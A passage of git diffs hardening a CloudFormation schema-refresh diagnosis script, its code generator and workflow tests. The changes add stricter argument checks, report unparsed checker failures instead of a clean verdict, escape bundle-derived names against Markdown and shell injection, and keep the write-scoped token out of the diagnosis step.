+  if (!existsSync(generatedPath)) {
+    throw new Error(
+      `${generatedPath} is missing — refusing to report which removals need a decision ` +
+        'from a coverage table that was never read.'
+    );
+  }
+  return parseDeclaredProperties(readFileSync(generatedPath, 'utf8'));
+}
+
 function main() {
   const args = process.argv.slice(2);
   const readArg = (/** @type {string} */ flag) => {
@@ -1268,11 +1375,7 @@ function main() {
   // `gen-property-coverage.ts` writes `handled` VERBATIM from the declaration
   // and does not intersect it with the fixture, so a property AWS just removed
   // is still listed there — which is exactly the "now bogus" condition.
-  const declared = parseDeclaredProperties(
-    existsSync(join(REPO_ROOT, 'src/provisioning/property-coverage.generated.ts'))
-      ? readFileSync(join(REPO_ROOT, 'src/provisioning/property-coverage.generated.ts'), 'utf8')
-      : ''
-  );
+  const declared = loadDeclaredProperties();
 
   const { removed, writableAdded, readOnlyAddedCount, unreadable } = collectFixtureDeltas({
     files: readdirSync(FIXTURES_DIR).filter((f) => f.endsWith('.json') && !f.startsWith('_')),
@@ -1291,6 +1394,10 @@ function main() {
   // every manual invocation is not a safety property. The risk the absent arm
   // carries — the WORKFLOW dropping the flag — is guarded where the evidence
   // still exists, by the workflow test asserting it passes the variable.
+  const readArgValue = (/** @type {string} */ flag) => {
+    const i = args.indexOf(flag);
+    return i === -1 || i + 1 >= args.length ? '' : args[i + 1];
+  };
   const readNumArg = (/** @type {string} */ flag) => {
     const i = args.indexOf(flag);
     if (i === -1) return 0;
@@ -1308,7 +1415,12 @@ function main() {
     readArg('--nested-key-log'),
     readNumArg('--nested-key-rc')
   );
-  const propertyCoverageFailed = readNumArg('--property-coverage-rc') !== 0;
+  // Comma-separated task names, so a fourth check is a workflow line and a
+  // `CHECK_GUIDANCE` row rather than another flag and another render branch.
+  const failedChecks = readArgValue('--failed-checks')
+    .split(',')
+    .map((c) => c.trim())
+    .filter((c) => c !== '');
   const divergences = nestedKey.divergences;
   const skipped = readArg('--skipped-log')
     .split('\n')
@@ -1329,7 +1441,7 @@ function main() {
       readOnlyAddedCount,
       divergences,
       nestedKeyUnparsed: nestedKey.unparsedFailure,
-      propertyCoverageFailed,
+      failedChecks,
       unreadable,
       skipped,
       sdkLag,

--- a/scripts/diagnose-schema-refresh.mjs
+++ b/scripts/diagnose-schema-refresh.mjs
@@ -1463,10 +1463,12 @@ function main() {
       unknown.push(a);
       continue;
     }
-    // A REPEAT is not a valid invocation: `rawArg` takes the FIRST match, so
-    // the later value is silently discarded — which rendered the clean verdict
-    // over an rc=3 checker, the last argv shape that still reached a confident
-    // answer.
+    // A REPEAT is not a valid invocation: `rawArg` reads exactly ONE of them and
+    // WHICH one depends on the spelling — it looks for the glued form before
+    // the space form, so `--nested-key-rc 0 --nested-key-rc=3` reads 3 while
+    // the other three orderings read 0. Either way a value is silently
+    // discarded, which rendered the clean verdict over a failing checker: the
+    // last argv shape that still reached a confident answer.
     if (seen.has(flag)) repeated.push(flag);
     seen.add(flag);
     if (a === flag) {
@@ -1480,9 +1482,9 @@ function main() {
   }
   if (repeated.length > 0) {
     throw new Error(
-      `flag(s) given more than once: ${[...new Set(repeated)].join(', ')} — only the first ` +
-        'would have been read. Refusing to report from an invocation this script did not ' +
-        'understand.'
+      `flag(s) given more than once: ${[...new Set(repeated)].join(', ')} — only one would ` +
+        'have been read, and which one depends on the spelling. Refusing to report from an ' +
+        'invocation this script did not understand.'
     );
   }
   if (unknown.length > 0) {

--- a/scripts/diagnose-schema-refresh.mjs
+++ b/scripts/diagnose-schema-refresh.mjs
@@ -49,6 +49,19 @@ import { fileURLToPath } from 'node:url';
 
 const __dirname = dirname(fileURLToPath(import.meta.url));
 const REPO_ROOT = join(__dirname, '..');
+
+/**
+ * Every way `gen-nested-key-coverage.ts --check` announces a failure.
+ *
+ * Both spellings are load-bearing: `FAIL` prefixes its four blocking verdicts
+ * (divergences, and the three stale-list refusals) and `failed` prefixes the
+ * crash path. A run that says either of these and yields no parsed finding must
+ * never render as clean. Fenced against the producer by
+ * `tests/unit/scripts/cfn-schema-refresh-workflow.test.ts`, which greps both
+ * spellings out of `gen-nested-key-coverage.ts` — nothing else joins the two
+ * files, and a reword there would otherwise make this pattern silently inert.
+ */
+export const NESTED_KEY_FAILURE_RE = /nested-key-coverage:\s*(FAIL|failed)\b/;
 const FIXTURES_DIR = join(REPO_ROOT, 'tests/fixtures/cfn-schemas');
 const PROVIDERS_DIR = join(REPO_ROOT, 'src/provisioning/providers');
 
@@ -91,38 +104,43 @@ export function comparePropertySets(committedJson, refreshedJson) {
  * the report; only the type and the bucket are pulled out, for grouping. Lines
  * it does not recognise are ignored rather than guessed at.
  *
- * **Refuses to return nothing from output that says it FAILED.** The checker's
- * finding-line format lives in another file and nothing fences the two, so a
- * wording change there would make this parser return `[]` and the pull request
- * would render "nothing needs a decision" over a red check — the same
- * silent-empty class {@link parseDeclaredProperties} already refuses for its own
- * input, and the failure this whole job exists to prevent, one level up.
+ * **A FAILING checker never renders as clean.** The finding-line format lives in
+ * another file and nothing joins the two, so a wording change there would make
+ * this parser return `[]` and the pull request would render "nothing needs a
+ * decision" over a red check — the silent-empty class this whole job exists to
+ * prevent, one level up. The checker also has three other FAIL modes (stale
+ * allow-list / segmentRenames / terminalRenames) plus a crash path that
+ * legitimately print no finding line, and refusing on THOSE discarded the whole
+ * diagnosis — losing the removal and addition sections too — while blaming a
+ * format change that had not happened. So a failure with no parsed finding is
+ * reported as `unparsed`: the caller renders a section naming it rather than
+ * either throwing the diagnosis away or claiming the refresh is clean.
  *
  * @param {string} checkOutput
- * @returns {Array<{resourceType: string, bucket: string, line: string}>}
+ * @returns {{divergences: Array<{resourceType: string, nestedKey: string, bucket: string, detail: string}>, unparsedFailure: boolean}}
  */
 export function parseNestedKeyDivergences(checkOutput) {
-  /** @type {Array<{resourceType: string, bucket: string, line: string}>} */
-  const out = [];
+  /** @type {Array<{resourceType: string, nestedKey: string, bucket: string, detail: string}>} */
+  const divergences = [];
   for (const raw of checkOutput.split('\n')) {
     const line = raw.trim();
-    const m = /^(AWS::[A-Za-z0-9]+::[A-Za-z0-9]+):\s.*\[([a-z-]+)\]/.exec(line);
-    if (!m) continue;
-    out.push({ resourceType: m[1], bucket: m[2], line });
-  }
-  // Scoped to the DIVERGENCE failure. The checker has three other FAIL modes
-  // (stale allow-list / segmentRenames / terminalRenames) that legitimately
-  // print no finding line, and refusing on those made `main()` discard the
-  // whole diagnosis — losing the removal and addition sections too — while
-  // blaming a format change that had not happened.
-  if (out.length === 0 && /nested-key-coverage:\s*FAIL\s*—\s*nested CFn/i.test(checkOutput)) {
-    throw new Error(
-      'audit:nested-key-coverage:check reported FAIL but no finding line parsed — ' +
-        'its output format changed. Refusing to report "nothing needs a decision" ' +
-        'over a failing check.'
+    // Captured field by field rather than quoted whole: `nestedKey` comes from
+    // the un-checksummable bundle by way of the fixtures, so the report must
+    // render it through the same guard every other bundle-derived name takes.
+    const m = /^(AWS::[A-Za-z0-9]+::[A-Za-z0-9]+):\s+(\S+)\s+\[([a-z-]+)\](?:\s+\((.*)\))?$/.exec(
+      line
     );
+    if (!m) continue;
+    divergences.push({
+      resourceType: m[1],
+      nestedKey: m[2],
+      bucket: m[3],
+      detail: m[4] ?? '',
+    });
   }
-  return out;
+  const unparsedFailure =
+    divergences.length === 0 && NESTED_KEY_FAILURE_RE.test(checkOutput);
+  return { divergences, unparsedFailure };
 }
 
 /**
@@ -331,6 +349,74 @@ export function sdkModelsMember(property, providerRelPath, repoRoot = REPO_ROOT)
  * @param {(pkg: string) => string} [viewLatest] injectable for tests
  * @returns {{installed: string, latest: string, behind: boolean} | undefined}
  */
+/**
+ * Every AWS SDK client a provider imports, with its installed version.
+ *
+ * Split out of {@link sdkModelsMember} because the version-lag question has no
+ * member to look up: the caller wants "which clients could this type's provider
+ * be lagging on", and asking `sdkModelsMember` with a name that matches nothing
+ * answered with `consulted[0]` — the FIRST import, which is right only by
+ * coincidence on a provider importing several (17 of 78 serve more than one
+ * type, and `ec2-provider.ts` imports several clients).
+ *
+ * @param {string | undefined} providerRelPath
+ * @param {string} [repoRoot]
+ * @returns {Array<{client: string, version: string}>}
+ */
+/**
+ * The imported clients that plausibly serve a resource type, best-effort.
+ *
+ * A provider imports more than the service it provisions — `@aws-sdk/client-sts`
+ * is in most of them — and reporting an unrelated client's version lag beside a
+ * Glue key divergence is a confident answer to a question nobody asked. The
+ * type's own service segment, case-folded and stripped of separators, is
+ * matched against the client's suffix.
+ *
+ * Falls back to EVERY row rather than to none when nothing matches: the caller
+ * renders an absent type as "UNKNOWN, not ruled out", and a silently empty
+ * answer would read as ruled out. The narrowing is a noise reduction, not a
+ * correctness claim.
+ *
+ * @param {string} resourceType
+ * @param {Array<{client: string, version: string}>} rows
+ * @returns {Array<{client: string, version: string}>}
+ */
+export function clientsForType(resourceType, rows) {
+  const service = (resourceType.split('::')[1] ?? '').toLowerCase();
+  if (!service) return rows;
+  const matched = rows.filter(
+    (r) => r.client.replace('@aws-sdk/client-', '').replace(/-/g, '') === service
+  );
+  return matched.length > 0 ? matched : rows;
+}
+
+export function sdkClientVersions(providerRelPath, repoRoot = REPO_ROOT) {
+  if (!providerRelPath) return [];
+  const abs = join(repoRoot, providerRelPath);
+  if (!existsSync(abs)) return [];
+  /** @type {Array<{client: string, version: string}>} */
+  const out = [];
+  const clients = [
+    ...new Set(
+      [...readFileSync(abs, 'utf8').matchAll(/from '(@aws-sdk\/client-[a-z0-9-]+)'/g)].map(
+        (m) => m[1]
+      )
+    ),
+  ];
+  for (const client of clients) {
+    if (!existsSync(join(repoRoot, 'node_modules', client, 'dist-types/models'))) continue;
+    try {
+      const version = JSON.parse(
+        readFileSync(join(repoRoot, 'node_modules', client, 'package.json'), 'utf8')
+      ).version;
+      if (typeof version === 'string' && version) out.push({ client, version });
+    } catch {
+      // An unreadable manifest is not a lag finding.
+    }
+  }
+  return out;
+}
+
 export function sdkVersionLag(client, installed, viewLatest = defaultViewLatest) {
   if (!installed) return undefined;
   let latest;
@@ -386,25 +472,34 @@ export function parseDeclaredProperties(generatedSource) {
   // a swallowed type renders "nothing needs a decision" over a red check, and
   // the whole-map refusal below cannot see it.
   const boundaries = [...generatedSource.matchAll(/\[\s*'([A-Z][\w:]+)'\s*,\s*\{/g)];
+  let recognised = 0;
   for (let i = 0; i < boundaries.length; i++) {
     const slice = generatedSource.slice(
       boundaries[i].index,
       i + 1 < boundaries.length ? boundaries[i + 1].index : undefined
     );
     const handled = /handled:\s*new Set(?:<[^>]*>)?\(\s*\[([\s\S]*?)\]\s*\)/.exec(slice);
+    const empty = /handled:\s*new Set(?:<[^>]*>)?\(\s*\)/.test(slice);
+    if (handled || empty) recognised++;
     declared.set(
       boundaries[i][1],
       new Set(handled ? [...handled[1].matchAll(/'([^']+)'/g)].map((x) => x[1]) : [])
     );
   }
 
-  // Refuses on a SHORTFALL, not just on zero. The zero-only form was blind to
-  // exactly the defect above, where 131 of 134 parsed and the report looked
-  // healthy.
-  if (declared.size !== boundaries.length || (boundaries.length === 0 && generatedSource.includes('PROPERTY_COVERAGE_BY_TYPE'))) {
+  // Refuses on a SHORTFALL of RECOGNISED entries, which is not the same as a
+  // shortfall of MAP KEYS: `declared.set` runs once per boundary, so comparing
+  // `declared.size` against `boundaries.length` could only ever fire on a
+  // duplicate type name. Measured — renaming the `handled` member emptied all
+  // 134 sets with no refusal, filtering every removal away and rendering
+  // "nothing needs a decision" over a red check. Both shapes count: a populated
+  // `new Set([...])` and the empty `new Set<string>()` a type with nothing
+  // declared is written as.
+  if (recognised !== boundaries.length) {
     throw new Error(
-      `property-coverage.generated.ts: parsed ${declared.size} of ${boundaries.length} ` +
-        'type entries — the shape changed. Refusing to report from a partial parse.'
+      `property-coverage.generated.ts: recognised the declaration shape in ${recognised} of ` +
+        `${boundaries.length} type entries — the shape changed. Refusing to report from a ` +
+        'partial parse.'
     );
   }
   if (declared.size === 0) {
@@ -451,12 +546,16 @@ export function renderDiagnosis({
   writableAdded,
   readOnlyAddedCount = 0,
   divergences,
+  nestedKeyUnparsed = false,
   skipped,
   sdkLag,
 }) {
   const lines = ['## What changed, and what needs a decision', ''];
 
-  if (removed.length === 0 && divergences.length === 0) {
+  // `nestedKeyUnparsed` is part of the condition, not just a section below it:
+  // a checker that FAILED in a mode this report cannot read is the one state
+  // where "additions only" is a confident wrong answer rather than a gap.
+  if (removed.length === 0 && divergences.length === 0 && !nestedKeyUnparsed) {
     lines.push('Nothing in this refresh needs a decision — additions only.', '');
   }
 
@@ -486,12 +585,26 @@ export function renderDiagnosis({
         // the SAME refresh, and both sides are in hand — so say so rather than
         // leaving the reader to spot it. This is the single most decisive
         // signal in the report when it fires.
-        const renames = entry.renameCandidates?.[property] ?? [];
+        //
+        // Re-checked against `writableAdded` HERE rather than trusted from the
+        // caller: a declaration cannot be pointed at a READ-ONLY property, so a
+        // rename claim naming one is advice that cannot be followed. The caller
+        // already filters, and that filter had no pin — swapping its argument
+        // for the unfiltered `added` list left every case green. Checking it
+        // where both sides are in hand closes the class whatever the caller
+        // passes.
+        const settableHere = new Set(
+          writableAdded.find((w) => w.resourceType === entry.resourceType)?.properties ?? []
+        );
+        const renames = (entry.renameCandidates?.[property] ?? []).filter((r) =>
+          settableHere.has(r)
+        );
         if (renames.length > 0) {
           lines.push(
-            `    - **Likely a RENAME**: this refresh also ADDED ` +
-              `${renames.map(renderName).join(', ')} to the same type. If so, ` +
-              'update the declaration to the new name rather than retiring it.'
+            `    - **Possibly a RENAME**: this refresh also ADDED ` +
+              `${renames.map(renderName).join(', ')} to the same type. That is a ` +
+              'name-similarity guess, not a finding — confirm it against the live ' +
+              'registry below before repointing the declaration.'
           );
         }
 
@@ -529,9 +642,34 @@ export function renderDiagnosis({
       ''
     );
     for (const d of divergences) {
-      lines.push(`- \`${d.line}\``);
+      const detail = d.detail ? ` — ${renderDetail(d.detail)}` : '';
+      lines.push(
+        `- ${renderName(d.resourceType)}: ${renderKey(d.nestedKey)} [${d.bucket}]${detail}`
+      );
     }
     lines.push('', ...divergenceProcedure(divergences, sdkLag), '');
+  }
+
+  if (nestedKeyUnparsed) {
+    // The checker said it failed and this report could not read a finding out
+    // of it. Neither throwing the diagnosis away nor calling the refresh clean
+    // is honest — both were tried, and the second is the exact silent-clean
+    // verdict the whole job exists to prevent.
+    lines.push(
+      '### The nested-key check FAILED in a mode this report cannot read',
+      '',
+      'It reported a failure and printed no finding line this parser recognises.',
+      'That is one of its non-divergence refusals (a stale `NESTED_KEY_ALLOW_LIST`,',
+      '`segmentRenames` or `terminalRenames` entry — each a real decision, and each',
+      'exactly what a schema refresh causes), a crash, or a change to its output',
+      'format. **Read the failing job log before merging**; the sections below are',
+      'still accurate for everything other than nested keys.',
+      '',
+      '```bash',
+      'vp run audit:nested-key-coverage:check',
+      '```',
+      ''
+    );
   }
 
   if (writableAdded.length > 0) {
@@ -609,6 +747,9 @@ export function pairRenames(property, writableAdded) {
   // maintainer an unrelated addition was `Id` renamed. PascalCase makes the
   // ends the meaningful boundaries: `RepositoryId` ends with `Id`,
   // `GeoProximityLocationV2` starts with `GeoProximityLocation`.
+  // An empty name matches every addition through `endsWith('')`. Unreachable
+  // from a real fixture, and refused rather than left to the caller.
+  if (!property) return [];
   return writableAdded.filter(
     (a) =>
       a !== property &&
@@ -644,6 +785,54 @@ export function renderName(name) {
 }
 
 /**
+ * The literal form of a name for a paste-able SHELL command.
+ *
+ * Same character class as {@link renderName} and for the same reason, but the
+ * consequence differs: these go inside single quotes in a `bash` block the
+ * runbook tells the maintainer to paste, so a `'` in a bundle-derived name is
+ * command injection into the maintainer's own terminal rather than a broken
+ * Markdown span. The class excludes it. A rejected name yields a placeholder
+ * that cannot be pasted by accident.
+ *
+ * @param {string} name
+ * @returns {string}
+ */
+export function renderLiteral(name) {
+  return /^[A-Za-z0-9.:]+$/.test(name) ? name : 'NAME_REJECTED_UNEXPECTED_CHARACTERS';
+}
+
+/**
+ * A nested key PATH, which is dotted and may carry the `#top` sentinel.
+ *
+ * Wider than {@link renderName}'s class by exactly the characters a path needs,
+ * and no wider: the point is refusing the ones that end a Markdown span or open
+ * a link (a backtick, `[`, `]`, `<`, `>`, whitespace).
+ *
+ * @param {string} key
+ * @returns {string}
+ */
+export function renderKey(key) {
+  return /^[A-Za-z0-9._:#-]+$/.test(key)
+    ? `\`${key}\``
+    : '**[key rejected: unexpected characters]**';
+}
+
+/**
+ * Free-form checker prose, stripped rather than rejected.
+ *
+ * Unlike a name this has no shape to validate against, and it is repo-derived
+ * (SDK model member names) rather than bundle-derived — so the treatment is to
+ * remove the characters that could break out of the line, not to refuse the
+ * whole string. It already arrives carrying backticks the checker wrote.
+ *
+ * @param {string} text
+ * @returns {string}
+ */
+export function renderDetail(text) {
+  return text.replace(/[`<>[\]()|\\\r\n]/g, '').trim();
+}
+
+/**
  * The steps that actually settle a removed-property case.
  *
  * Written as commands rather than as advice: a report that classifies without
@@ -662,13 +851,13 @@ function removedProcedure(removed) {
     '',
     '1. If a **RENAME** is flagged above it is a NAME-SIMILARITY guess, not a',
     '   finding — confirm with step 2 before repointing the declaration.',
-    '2. Otherwise confirm against the live registry — this is the API AWS serves,',
+    '2. Confirm against the live registry — this is the API AWS serves,',
     '   not the published bundle:',
     '',
     '   ```bash',
-    `   aws cloudformation describe-type --type RESOURCE --type-name '${type}' \\`,
+    `   aws cloudformation describe-type --type RESOURCE --type-name '${renderLiteral(type)}' \\`,
     "     --query Schema --output text | jq -r '.properties | keys[]' | grep -i " +
-      `'${property}'`,
+      `'${renderLiteral(property)}'`,
     '   ```',
     '',
     '3. If the SDK evidence says the name is gone AND step 2 finds nothing, the',
@@ -690,22 +879,31 @@ function removedProcedure(removed) {
  * @param {Array<{resourceType: string, bucket: string, line: string}>} divergences
  * @returns {string[]}
  */
-function divergenceProcedure(divergences, lag) {
+function divergenceProcedure(divergences, sdkLag) {
   const hasMissing = divergences.some((d) => d.bucket !== 'case-divergence');
   /** @type {string[]} */
   const lagLines = [];
-  if (hasMissing && lag) {
+  const lags = sdkLag ?? [];
+  if (hasMissing && lags.length > 0) {
+    // One line per (type, client) rather than one line for the whole section.
+    // A single line covering "the first divergent type" left every other
+    // divergence's SDK-lag reading unstated while reading like a verdict, and
+    // the client it named came from the provider's FIRST import.
+    lagLines.push('', '**Installed vs published, for the divergent types above:**', '');
+    for (const l of lags) {
+      lagLines.push(
+        l.behind
+          ? `- ${renderName(l.resourceType)} — \`${l.client}\` is ${l.installed}, npm ` +
+            `publishes ${l.latest}. The SDK-lag reading is LIVE here: bump and re-check ` +
+            'before allow-listing anything.'
+          : `- ${renderName(l.resourceType)} — \`${l.client}\` is ${l.installed}, which is ` +
+            'current, so the SDK-lag reading is ruled out here.'
+      );
+    }
     lagLines.push(
       '',
-      lag.behind
-        ? `**For ${renderName(lag.resourceType)} only**: the installed ` +
-          `\`${lag.client}\` is ${lag.installed}; npm publishes ${lag.latest}. The ` +
-          'SDK-lag reading is LIVE — bump and re-check before allow-listing anything. ' +
-          'Divergences on other services are NOT covered by this line.'
-        : `**For ${renderName(lag.resourceType)} only**: the installed ` +
-          `\`${lag.client}\` is ${lag.installed}, which is current, so the SDK-lag ` +
-          'reading is ruled out there. Divergences on other services are NOT covered ' +
-          'by this line.',
+      'A type absent from that list is one whose client could not be read — its',
+      'SDK-lag reading is UNKNOWN, not ruled out.',
       ''
     );
   }
@@ -846,26 +1044,39 @@ function main() {
     }
   }
 
-  const divergences = parseNestedKeyDivergences(readArg('--nested-key-log'));
+  const nestedKey = parseNestedKeyDivergences(readArg('--nested-key-log'));
+  const divergences = nestedKey.divergences;
   const skipped = readArg('--skipped-log')
     .split('\n')
     .map((l) => l.trim())
     .filter((l) => /^AWS::/.test(l));
 
-  // Version lag is asked only when a divergence needs it, and only for the
-  // client of the first divergent type — one network call, never on the happy
-  // path, and its failure is silent by construction.
-  /** @type {{client: string, installed: string, latest: string, behind: boolean} | undefined} */
-  let sdkLag;
-  const firstDivergent = divergences.find((d) => d.bucket !== 'case-divergence');
-  if (firstDivergent) {
-    const evidence = sdkModelsMember(
-      'CdkdVersionProbeOnly',
-      providerFiles.get(firstDivergent.resourceType)
+  // Version lag is asked only when a divergence needs it — never on the happy
+  // path — and for EVERY divergent type's clients rather than the first one's
+  // first import. Each distinct client is asked once; the failure of any single
+  // lookup is silent by construction and shows up as an absent row, which the
+  // rendered section names as UNKNOWN rather than ruled out.
+  /** @type {Array<{resourceType: string, client: string, installed: string, latest: string, behind: boolean}>} */
+  const sdkLag = [];
+  /** @type {Map<string, {installed: string, latest: string, behind: boolean} | undefined>} */
+  const lagByClient = new Map();
+  const emitted = new Set();
+  for (const d of divergences) {
+    if (d.bucket === 'case-divergence') continue;
+    const rows = clientsForType(
+      d.resourceType,
+      sdkClientVersions(providerFiles.get(d.resourceType))
     );
-    if (evidence) {
-      const lag = sdkVersionLag(evidence.client, evidence.version);
-      if (lag) sdkLag = { client: evidence.client, resourceType: firstDivergent.resourceType, ...lag };
+    for (const { client, version } of rows) {
+      if (!lagByClient.has(client)) lagByClient.set(client, sdkVersionLag(client, version));
+      const lag = lagByClient.get(client);
+      // One row per (type, client): several divergences routinely land on the
+      // same type, and repeating its row reads as several findings.
+      const key = `${d.resourceType}\u0000${client}`;
+      if (lag && !emitted.has(key)) {
+        emitted.add(key);
+        sdkLag.push({ resourceType: d.resourceType, client, ...lag });
+      }
     }
   }
 
@@ -875,6 +1086,7 @@ function main() {
       writableAdded,
       readOnlyAddedCount,
       divergences,
+      nestedKeyUnparsed: nestedKey.unparsedFailure,
       skipped,
       sdkLag,
     }) + '\n'

--- a/scripts/diagnose-schema-refresh.mjs
+++ b/scripts/diagnose-schema-refresh.mjs
@@ -1415,7 +1415,8 @@ export function loadDeclaredProperties(repoRoot = REPO_ROOT) {
 }
 
 /**
- * Every flag this script accepts, in the order the synopsis lists them.
+ * Every flag this script accepts. Fenced as a SET against the synopsis — the
+ * order here is for reading, not a checked property.
  *
  * EXPORTED so the header docblock and the argument readers cannot drift apart:
  * the synopsis documented `--property-coverage-rc` for two rounds after
@@ -1440,11 +1441,27 @@ function main() {
   // for the check list), so a typo, a retired flag or a single-dash spelling
   // all render as clean. Same guard, and the same reasoning, as the sibling
   // producer `refresh-cfn-schemas.mjs` carries.
-  const unknown = args.filter(
-    (a) =>
-      a.startsWith('-') &&
-      !KNOWN_FLAGS.some((flag) => a === flag || a.startsWith(`${flag}=`))
-  );
+  // EVERY unrecognised argument, not just the dash-leading ones: this script
+  // takes no positionals, and `failed-checks property-coverage` — one spelling
+  // over from the `-failed-checks` the first guard caught — fell straight
+  // through to the permissive arms and rendered the clean verdict. A guard
+  // covering fewer spellings than its subject accepts is the shape this whole
+  // file kept producing.
+  const unknown = [];
+  for (let i = 0; i < args.length; i++) {
+    const a = args[i];
+    if (KNOWN_FLAGS.some((flag) => a.startsWith(`${flag}=`))) continue;
+    if (KNOWN_FLAGS.includes(a)) {
+      // Its value is consumed only if it could BE one. A dash-leading token is
+      // not a value here — that is the same rule `rawArg` applies — so
+      // consuming it blindly would let `--failed-checks --skipped-log <path>`
+      // swallow the second flag and report the PATH as the unknown argument.
+      const next = args[i + 1];
+      if (next !== undefined && !next.startsWith('-')) i += 1;
+      continue;
+    }
+    unknown.push(a);
+  }
   if (unknown.length > 0) {
     throw new Error(
       `unrecognized flag(s): ${unknown.join(', ')} — known flags are ${KNOWN_FLAGS.join(', ')}. ` +

--- a/scripts/gen-property-coverage.ts
+++ b/scripts/gen-property-coverage.ts
@@ -250,14 +250,14 @@ function stringLiteralValue(node: ts.Node | undefined): string | null {
 // literal. `renderHandled` reads provider sources rather than the bundle, so it
 // was never exposed; it takes the same treatment because the two are read as a
 // pair and the next editor should not have to work out which is which.
-const renderHandled = (handled: string[]): string => {
+export const renderHandled = (handled: string[]): string => {
   if (handled.length === 0) return 'new Set<string>()';
   return `new Set<string>([\n${handled
     .map((p) => `        ${JSON.stringify(p)},`)
     .join('\n')}\n      ])`;
 };
 
-const renderSilentDrop = (
+export const renderSilentDrop = (
   drops: Array<[string, string]>
 ): string => {
   if (drops.length === 0) return 'new Map<string, string>()';
@@ -380,7 +380,7 @@ function main(): void {
   .map(
     ([type, cov]) =>
       `  [
-    '${type}',
+    ${JSON.stringify(type)},
     {
       handled: ${renderHandled(cov.handled)},
       silentDrop: ${renderSilentDrop(cov.silentDrop)},

--- a/scripts/gen-property-coverage.ts
+++ b/scripts/gen-property-coverage.ts
@@ -242,10 +242,18 @@ function stringLiteralValue(node: ts.Node | undefined): string | null {
   return null;
 }
 
+// `JSON.stringify`, not a hand-quoted literal, in BOTH renderers below. One of
+// them interpolates a name that comes from AWS's public schema bundle — which
+// this repo downloads over TLS with no checksum — straight into generated
+// TypeScript that is then executed by the same workflow step, by the bot PR's
+// own CI, and shipped to npm on merge. A key containing `', '` escapes the
+// literal. `renderHandled` reads provider sources rather than the bundle, so it
+// was never exposed; it takes the same treatment because the two are read as a
+// pair and the next editor should not have to work out which is which.
 const renderHandled = (handled: string[]): string => {
   if (handled.length === 0) return 'new Set<string>()';
   return `new Set<string>([\n${handled
-    .map((p) => `        '${p}',`)
+    .map((p) => `        ${JSON.stringify(p)},`)
     .join('\n')}\n      ])`;
 };
 
@@ -254,7 +262,7 @@ const renderSilentDrop = (
 ): string => {
   if (drops.length === 0) return 'new Map<string, string>()';
   return `new Map<string, string>([\n${drops
-    .map(([p, r]) => `        ['${p}', ${JSON.stringify(r)}],`)
+    .map(([p, r]) => `        [${JSON.stringify(p)}, ${JSON.stringify(r)}],`)
     .join('\n')}\n      ])`;
 };
 

--- a/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
+++ b/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
@@ -74,7 +74,13 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
    * simply stops opening PRs, on a cadence nobody is watching.
    */
   describe('step wiring', () => {
-    const steps: Array<{ name?: string; if?: string; run?: string; uses?: string }> =
+    const steps: Array<{
+      name?: string;
+      if?: string;
+      run?: string;
+      uses?: string;
+      env?: Record<string, string>;
+    }> =
       parsed.jobs.refresh.steps;
     const byName = (name: string) => {
       const step = steps.find((s) => s.name === name);
@@ -117,7 +123,7 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
     it('pushes onto an open PR ADDITIVELY — never forcing over a human commit', () => {
       const publish = shellOf('Publish the refresh');
       expect(publish).toContain('${existing_branch}');
-      expect(publish).toMatch(/Skipping this cycle/);
+      expect(publish).toMatch(/recomputes the same drift/);
       // Sliced STRUCTURALLY, not matched on one line. The earlier assertion was
       // `/force[^\n]*\$\{existing_branch\}/`, and the real push is
       // line-continued — so the mutation it existed to catch (adding `--force`
@@ -134,13 +140,19 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
 
     it('posts the diagnosis, on a new PR and on an updated one alike', () => {
       const publish = shellOf('Publish the refresh');
-      expect(publish).toContain('diagnose-schema-refresh.mjs');
-      // Generated BEFORE the commit: the comparison against the COMMITTED
-      // fixtures is the whole source of "AWS removed this in THIS refresh".
-      expect(publish.indexOf('diagnose-schema-refresh.mjs')).toBeLessThan(
-        publish.indexOf('git commit')
+      // The diagnosis runs in its OWN step, before the token-holding one — it
+      // spawns npm, which inherits the environment.
+      const diagnose = shellOf('Diagnose what needs a decision');
+      expect(diagnose).toContain('diagnose-schema-refresh.mjs');
+      expect(publish).not.toContain('diagnose-schema-refresh.mjs');
+      const order = steps.map((st) => st.name);
+      expect(order.indexOf('Diagnose what needs a decision')).toBeLessThan(
+        order.indexOf('Publish the refresh')
       );
-      expect(publish).toContain('gh pr comment');
+      // Anchored to the COMMENT's own body file. `--body-file` alone was
+      // satisfied by the create path, so swapping the comment to `--body "x"`
+      // stayed green.
+      expect(publish).toMatch(/gh pr comment[\s\S]{0,120}--body-file \/tmp\/diagnosis\.md/);
       expect(publish).toContain('--body-file /tmp/pr-body.md');
     });
 
@@ -245,6 +257,55 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
       expect(publish).toContain('branch="bot/cfn-schema-refresh/${cycle}"');
     });
 
+    it('keeps the write-scoped token out of the checker and the diagnosis', () => {
+      // The diagnosis spawns `npm`, which inherits the environment; running it
+      // in the step that holds `contents: write` widens exactly the surface
+      // `persist-credentials: false` was added to close.
+      const diagnose = steps.find((st) => st.name === 'Diagnose what needs a decision')!;
+      expect(diagnose.env, 'the diagnosis step must hold no token').toBeUndefined();
+    });
+
+    it('sets pipefail on the tee\u2019d refresh, or the exit code is lost', () => {
+      // `run:` with no `shell:` is `bash -e {0}` — NOT pipefail. Without this
+      // the `tee` added for the skip list reports ITS status, and the refresh's
+      // exit 2 on a capture failure becomes "no drift" and a green run.
+      const refresh = shellOf('Refresh fixtures from the public schema bundle');
+      expect(refresh).toContain('tee /tmp/refresh.log');
+      expect(refresh).toContain('set -o pipefail');
+    });
+
+    it('fails the step when a push failure is NOT a lost race', () => {
+      // A permission or branch-protection failure must not share the lost-race
+      // green exit, or the daily job lands nothing forever while reporting
+      // success.
+      const publish = shellOf('Publish the refresh');
+      expect(publish).toContain('before_sha');
+      expect(publish).toMatch(/::error::/);
+      expect(publish).toMatch(/exit 1/);
+    });
+
+    it('pins the cross-file literals the shell greps for', () => {
+      // Producer and consumer live in different files with nothing joining
+      // them: either reword silently empties the skip list or kills the
+      // umbrella fold, with no failure anywhere.
+      const diagnose = shellOf('Diagnose what needs a decision');
+      expect(readFileSync(join(REPO_ROOT, 'scripts/refresh-cfn-schemas.mjs'), 'utf8')).toContain(
+        'No entry in the public bundle'
+      );
+      expect(diagnose).toContain('No entry in the public bundle');
+      const heading = '### Writable properties AWS added';
+      expect(
